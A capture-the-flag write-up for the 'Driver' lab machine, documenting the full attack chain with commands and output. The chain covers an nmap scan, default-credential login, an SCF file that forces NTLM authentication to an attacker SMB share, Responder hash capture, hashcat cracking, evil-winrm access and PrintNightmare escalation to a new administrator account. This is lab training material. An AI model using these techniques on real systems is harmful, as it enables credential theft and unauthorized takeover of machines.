Enumeration
NMAP
┌──(root💀kali)-[~]
└─# nmap -sV -sC -T4 -p- -v 10.10.11.106
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2021-11-18T18:20:53
|_ start_date: 2021-11-18T18:12:04
|_clock-skew: mean: 7h04m58s, deviation: 0s, median: 7h04m58s
SMB and NetNTLMv2 hash grabbing
There is a http service running on driver.htb on port 80. It requires me to HTTP authenticate with username:password when trying to access it. I tried default credentials such as admin:password, admin:admin which led me in.
It seems we have an upload functionality. I have tried to upload reverse shell but I could not get to find any useful directory where files could be uploaded also no LFI was available. I thought to research the other services since we have SMB which is used for file sharing if we can use it to somehow get a reverse shell and found this awesome post: https://sql–injection.blogspot.com/p/smb.html
In our case, we have to create the file, find a way to upload it and we also have to get the information back to our own share through responder.
┌──(root💀kali)-[~]
└─# cat steal-hash.scf
[Shell]
Command=2
IconFile=\\10.10.14.7\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop
┌──(root💀kali)-[~]
└─# responder --lm -v -I tun0
[+] Listening for events...
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>
[SMB] NTLMv2 Hash : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>::<EDITED>:<EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : <EDITED>\<EDITED>
[SMB] NTLMv2 Hash : <EDITED>
Analyse the hash with hashid in order to confirm the identity of the hash.
┌──(root💀kali)-[~]
└─# cat to-crack.hash
<EDITED>
┌──(root💀kali)-[~]
└─# hashid to-crack.hash
--File 'to-crack.hash'--
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
Analyzing '<EDITED>'
[+] NetNTLMv2
--End of file 'to-crack.hash'--
The hash is NetNTLMv2. Now we have to crack it with hashcat.
┌──(root💀kali)-[~]
└─# hashcat --help |grep NetNTLMv2
5600 | NetNTLMv2 | Network Protocols
┌──(root💀kali)-[~]
└─# hashcat -a 0 -m 5600 to-crack.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
<EDITED>::<EDITED>:<EDITED>
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: to-crack.hash
................................
smbmap
┌──(root💀kali)-[~]
└─# smbmap -H 10.10.11.106 -u <EDITED> -p '<EDITED>' 2 ⨯
[+] IP: 10.10.11.106:445 Name: driver.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
Foothold
Nice Post about evil-winrm : https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md
Our enumeration discovered another open port 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) .
## Description & Purpose
This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol
that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating
Systems in order to make life easier to system administrators.
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only
if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting
phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate
purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.
It is based mainly in the WinRM Ruby library which changed its way to work since its version 2.0. Now instead of using WinRM
protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runspace pools as well as creating and processing pipelines.
Now that we have some understanding about the tool and we have credentials, we can proceed to getting foothold.
┌──(root💀kali)-[~]
└─# evil-winrm
Evil-WinRM shell v3.3
Error: missing argument: ip, user
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help message
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u <EDITED> -p '<EDITED>' 1 ⨯
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
Windows Recon
This page is amazing and provides plenty of information on windows recon phase.
https://github.com/evilcel3ri/yaCTFpl/blob/aleph/manual.md#post-exploitation
- winPEAS.exe
## Basic information
The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.
It should take only a **few seconds** to execute almost all the checks and **some seconds/minutes during the lasts checks searching for known filenames** that could contain passwords (the time depened on the number of files in your home folder). By default only **some** filenames that could contain credentials are searched, you can use the **searchall** parameter to search all the list (this could will add some minutes).
To enable colored version of winPEAS change the registry key value:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
The operation completed successfully.
Analysis of the massive output winPEAS provides, allows me to discover spoolsv service running on the local computer. I remember from previous machines that spoolsv is a print spooler service. Among other findings, I decided to proceed with this one since a possible exploit is well documented here: https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 80 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 135 0.0.0.0 0 Listening 712 svchost
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 47001 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 49408 0.0.0.0 0 Listening 448 wininit
TCP 0.0.0.0 49409 0.0.0.0 0 Listening 868 svchost
TCP 0.0.0.0 49410 0.0.0.0 0 Listening 1188 spoolsv
TCP 0.0.0.0 49411 0.0.0.0 0 Listening 816 svchost
TCP 0.0.0.0 49412 0.0.0.0 0 Listening 568 services
TCP 0.0.0.0 49413 0.0.0.0 0 Listening 576 lsass
TCP 10.10.11.106 139 0.0.0.0 0 Listening 4 System
TCP 10.10.11.106 5985 10.10.14.7 47132 Time Wait 0 Idle
TCP 10.10.11.106 5985 10.10.14.7 47134 Established 4 System
Enumerating IPv6 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP [::] 80 [::] 0 Listening 4 System
TCP [::] 135 [::] 0 Listening 712 svchost
TCP [::] 445 [::] 0 Listening 4 System
TCP [::] 5985 [::] 0 Listening 4 System
TCP [::] 47001 [::] 0 Listening 4 System
TCP [::] 49408 [::] 0 Listening 448 wininit
TCP [::] 49409 [::] 0 Listening 868 svchost
TCP [::] 49410 [::] 0 Listening 1188 spoolsv
TCP [::] 49411 [::] 0 Listening 816 svchost
TCP [::] 49412 [::] 0 Listening 568 services
TCP [::] 49413 [::] 0 Listening 576 lsass
Privilege Escalation
Download the exploit file on your local kali.
┌──(root💀kali)-[/opt]
└─# git clone https://github.com/calebstewart/CVE-2021-1675 130 ⨯
I have renamed the file to print-nightmare.ps1. And I have uploaded the file onto the victim machine as so:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> upload /opt/print-nightmare/print-nightmare.ps1
Info: Uploading /opt/print-nightmare/print-nightmare.ps1 to C:\Users\tony\Documents\print-nightmare.ps1
Data: 238080 bytes of 238080 bytes copied
Info: Upload successful!
I am importing the script but I receive the following error due to the registry key being unset.
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
File C:\Users\<EDITED>\Documents\print-nightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module ./print-nightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
To fix this I force the execution policy to an Unrestricted state:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy
Restricted
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Get-ExecutionPolicy
Unrestricted
Creating administrator user:
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Import-Module ./print-nightmare.ps1
*Evil-WinRM* PS C:\Users\<EDITED>\Documents> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\<EDITED>\AppData\Local\Temp\nightmare.dll
Logging in as the newly created user:
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.11.106 -u 0xdf -p '0xdf0xdf'
*Evil-WinRM* PS C:\Users\0xdf\Documents> whoami
driver\0xdf
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4bc<EDITED>
Try smarter, not harder. 
I think this machine is really not realistic. Is it a printer? Is it a client? How can I expect a scf-file being executed automatically by a user when I upload it as a printer driver? That just doesn’t make since and would not appear like this in real world…
If you think you want real world examples, you should go for some of the more advanced ones. This box is really easy.